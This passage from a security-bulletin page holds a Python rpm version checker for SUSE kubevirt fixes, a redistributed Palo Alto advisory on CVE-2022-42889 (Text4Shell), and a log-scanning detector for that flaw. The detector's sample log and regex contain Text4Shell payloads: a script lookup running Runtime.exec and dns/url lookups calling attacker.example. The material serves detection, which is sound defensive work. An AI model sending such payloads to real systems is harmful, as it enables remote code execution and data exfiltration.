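# lists (SLE Module for Containers entries plus one Leap-only package).
FIXED = """
kubevirt-manifests-0.49.0-150300.8.15.1
kubevirt-virtctl-0.49.0-150300.8.15.1
kubevirt-virt-operator-0.49.0-150300.8.15.1
containerized-data-importer-manifests-1.43.2-150300.8.11.1
"""

# Constructed inventory in the shape of
#   rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'
# one package behind the fix, one exactly at it, one at a later rebuild,
# one unrelated; kubevirt-virt-operator is deliberately absent.
INSTALLED = """
kubevirt-manifests-0.49.0-150300.8.12.2
kubevirt-virtctl-0.49.0-150300.8.15.1
containerized-data-importer-manifests-1.43.2-150300.8.13.1
bash-4.4-150400.25.22
"""

# rpm splits version strings into runs of digits, runs of letters and the
# '~' marker; every other character is a separator and is ignored.
_SEGMENT = re.compile(r"\d+|[A-Za-z]+|~")


def rpmvercmp(a: str, b: str) -> int:
    """Order two version or release strings as rpm's rpmvercmp() does.

    Returns -1, 0 or 1. Numeric segments compare as integers (so 8.15 > 8.9,
    which plain string comparison gets wrong), letter segments compare
    lexically, a numeric segment is newer than a letter segment, '~' sorts
    before anything including end of string (1.0~rc1 < 1.0), and when one
    side runs out of segments the longer side is newer. The '^' marker of
    recent rpm releases is not handled.
    """
    for x, y in zip_longest(_SEGMENT.findall(a), _SEGMENT.findall(b)):
        if x == "~" or y == "~":
            if x != y:
                return -1 if x == "~" else 1
            continue
        if x is None:
            return -1
        if y is None:
            return 1
        if x.isdigit() and y.isdigit():
            c = (int(x) > int(y)) - (int(x) < int(y))
        elif x.isdigit() or y.isdigit():
            c = 1 if x.isdigit() else -1
        else:
            c = (x > y) - (x < y)
        if c:
            return c
    return 0


def parse_nvr(nvr: str) -> tuple:
    """Split NAME-VERSION-RELEASE. Package names here contain hyphens but
    VERSION and RELEASE never do, so splitting on the last two is safe."""
    name, version, release = nvr.rsplit("-", 2)
    return name, version, release


def vr_cmp(installed: tuple, fixed: tuple) -> int:
    """Compare (version, release) pairs: version decides, release breaks ties."""
    return rpmvercmp(installed[0], fixed[0]) or rpmvercmp(installed[1], fixed[1])


def check(fixed_list: str, inventory: str) -> dict:
    """Map each package from the bulletin to 'fixed', 'vulnerable' or
    'not installed' according to the inventory."""
    installed = {}
    for nvr in inventory.split():
        name, version, release = parse_nvr(nvr)
        installed[name] = (version, release)
    verdict = {}
    for nvr in fixed_list.split():
        name, version, release = parse_nvr(nvr)
        if name not in installed:
            verdict[name] = "not installed"
        elif vr_cmp(installed[name], (version, release)) >= 0:
            verdict[name] = "fixed"
        else:
            verdict[name] = "vulnerable"
    return verdict


if __name__ == "__main__":
    inventory = open(sys.argv[1]).read() if len(sys.argv) > 1 else INSTALLED
    for name, status in sorted(check(FIXED, inventory).items()):
        print(f"{status:14} {name}")
```

One caveat the package lists themselves make visible: on SUSE Linux Enterprise Module for Containers the RPMs shipped are the manifests and virtctl, while the security content of these updates, by SUSE's own description, is the rebuilt container images. A "fixed" verdict from this check therefore means the updated manifests are on the host, not that the cluster is already running the rebuilt images; those still have to be rolled out from the new manifests before running pods pick them up.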
ESB-2022.5776 - Palo Alto Products: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5776
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Palo Alto Products
Publisher: Palo Alto Networks
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Network Appliance
Virtualisation
Resolution: Mitigation
CVE Names: CVE-2022-42889
Original Bulletin:
https://securityadvisories.paloaltonetworks.com/CVE-2022-42889
Comment: CVSS (Max): 9.8 CVE-2022-42889 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
Palo Alto Networks Security Advisories / CVE-2022-42889
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
Severity: Informational
Published 2022-11-09
Updated 2022-11-09
Reference CVE-2022-42889
Discovered externally
Description
Palo Alto Networks has evaluated the Apache Commons Text library vulnerability
CVE-2022-42889, known as Text4Shell, for all products and services.
The Palo Alto Networks Product Security Assurance team has confirmed that all
products and services are not impacted by this vulnerability.
Product Status
Product                              Versions Affected   Unaffected
AutoFocus                            None                all
Bridgecrew                           None                all
Cloud NGFW                           None                all
Cortex Data Lake                     None                all
Cortex XDR                           None                all
Cortex XDR Agent                     None                all
Cortex Xpanse                        None                all
Cortex XSOAR                         None                all
Enterprise Data Loss Prevention      None                all
Exact Data Matching CLI              None                all
Expanse                              None                all
Expedition Migration Tool            None                all
GlobalProtect App                    None                all
IoT Security                         None                all
Okyo Garde                           None                all
Palo Alto Networks App for Splunk    None                all
PAN-OS                               None                all
Prisma Access                        None                all
Prisma Cloud                         None                all
Prisma Cloud Compute                 None                all
Prisma SD-WAN (CloudGenix)           None                all
Prisma SD-WAN ION                    None                all
SaaS Security                        None                all
User-ID Agent                        None                all
WildFire Appliance (WF-500)          None                all
WildFire Cloud                       None                all
Exploitation Status
Palo Alto Networks is not aware of any malicious exploitation of this issue on
any of our products.
Weakness Type
CWE-94 Improper Control of Generation of Code ('Code Injection')
Solution
No software updates are required at this time.
Workarounds and Mitigations
Customers with a Threat Prevention subscription can block known attacks for
CVE-2022-42889 by enabling Threat ID 93157 (Applications and Threats content
update 8632). This mitigation reduces the risk of exploitation from known
exploits.
Timeline
2022-11-09 Initial publication
(C) 2022 Palo Alto Networks, Inc. All rights reserved.
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
=Ze+o
-----END PGP SIGNATURE-----
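The Palo Alto bulletin above is a non-impact statement, but it does name the one control on offer, a Threat Prevention signature for known CVE-2022-42889 exploit attempts, and its own wording ("reduces the risk of exploitation from known exploits") is the caveat that comes with any signature. The script below is an added example for this page; it is not Palo Alto Networks code and not a reproduction of Threat ID 93157, whose matching logic is not published. It shows what that class of signature has to look for. Text4Shell abuses the interpolator returned by Apache Commons Text's StringSubstitutor.createInterpolator() in versions 1.5 through 1.9, which resolves ${script:...}, ${dns:...} and ${url:...} lookups inside attacker-controlled input, so a detector scans request targets for those three prefixes after undoing the percent-encoding attackers stack on top. The access-log lines are constructed sample data; the addresses and host names in them are placeholders.

```python
"""Signature-style detection of CVE-2022-42889 (Text4Shell) attempts in
web-server access logs.

Added example for this page; not Palo Alto Networks code and not Threat ID
93157. SAMPLE_LOG is constructed test data (placeholder addresses and hosts).
"""
import re
import sys
from urllib.parse import unquote

# Constructed access-log lines (common log format). Lines 2-4 carry the three
# Commons Text lookups that CVE-2022-42889 turns into code execution, DNS
# exfiltration and server-side request forgery respectively; line 4 is
# double percent-encoded. Line 5 uses ${...} syntax with a harmless variable
# name and must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2022:10:01:02 +0000] "GET /search?q=laptop HTTP/1.1" 200 512
10.0.0.9 - - [09/Nov/2022:10:01:05 +0000] "GET /search?q=${script:javascript:java.lang.Runtime.getRuntime().exec('id')} HTTP/1.1" 500 0
10.0.0.9 - - [09/Nov/2022:10:01:07 +0000] "GET /search?q=%24%7Bdns%3Aaddress%3Aattacker.example%7D HTTP/1.1" 200 512
10.0.0.9 - - [09/Nov/2022:10:01:09 +0000] "GET /search?q=%2524%257Burl%253AUTF-8%253Ahttp%253A%252F%252Fattacker.example%257D HTTP/1.1" 200 512
10.0.0.7 - - [09/Nov/2022:10:01:11 +0000] "GET /docs/${version}/index.html HTTP/1.1" 404 0
"""

# The three default lookups that execute code or reach out: script (JSR-223
# code), dns (resolver query, used for exfiltration) and url (HTTP fetch).
# Case-insensitive because the interpolator lower-cases the prefix before
# dispatching, so ${SCRIPT:...} works just as well for the attacker.
DANGEROUS_LOOKUP = re.compile(r"\$\{(script|dns|url):", re.IGNORECASE)

# Request target inside the quoted request field of a common/combined log line.
REQUEST_TARGET = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) HTTP/')


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Strip up to max_rounds layers of percent-encoding. Attackers stack
    layers so that a single decode still leaves '%24%7B' rather than '${';
    stop early once a round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_text4shell(log_text: str) -> list:
    """Return one record per log line whose request target, after decoding,
    contains a dangerous Commons Text lookup prefix."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        target = fully_decode(m.group(1))
        lookup = DANGEROUS_LOOKUP.search(target)
        if lookup:
            hits.append({
                "line": lineno,
                "src": line.split(" ", 1)[0],
                "lookup": lookup.group(1).lower(),
                "target": target,
            })
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for h in find_text4shell(text):
        print(f"line {h['line']}: {h['src']} {h['lookup']} lookup in {h['target']}")
```

Like the IPS signature, this only finds request shapes it knows about: a payload carried in a JSON body, a header, or an encoding the regex does not undo is a miss, and a hit only matters where the application feeds that input to a StringSubstitutor. The control of record for Text4Shell is upgrading Commons Text to 1.10.0, which removes script, dns and url from the default lookups; a network signature buys time for that, which is why the advisory words it as risk reduction rather than as a fix.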